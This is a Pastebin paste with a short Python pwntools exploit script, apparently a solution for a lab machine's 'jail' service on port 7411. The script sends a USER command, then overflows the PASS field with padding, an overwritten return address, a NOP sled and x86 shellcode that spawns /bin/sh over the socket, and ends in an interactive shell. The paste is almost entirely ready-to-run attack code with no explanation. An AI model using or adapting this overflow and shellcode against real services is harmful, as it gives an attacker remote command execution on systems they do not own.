Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import struct
- from pwn import *
- HOST = "10.10.10.34"
- PORT = 7411
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((HOST, PORT))
- def p(x):
- return struct.pack('<I', x)
- context(os = 'linux', arch = 'i386')
- HOST = "10.10.10.34"
- print args['HOST']
- if HOST != "":
- r = remote(HOST, PORT)
- else:
- r = process('./jail')
- r.recvuntil('OK Ready. Send USER command.\n')
- r.sendline('USER admin\n')
- padding = "A"*28
- eip = pack(0x804910f)
- shellcode = (
- "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
- "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
- "\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
- "\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
- "\x89\xe3\x31\xc9\xcd\x80")
- nops = "\x90"*42
- r.sendline("PASS " + padding + eip + nops + shellcode + "\n")
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement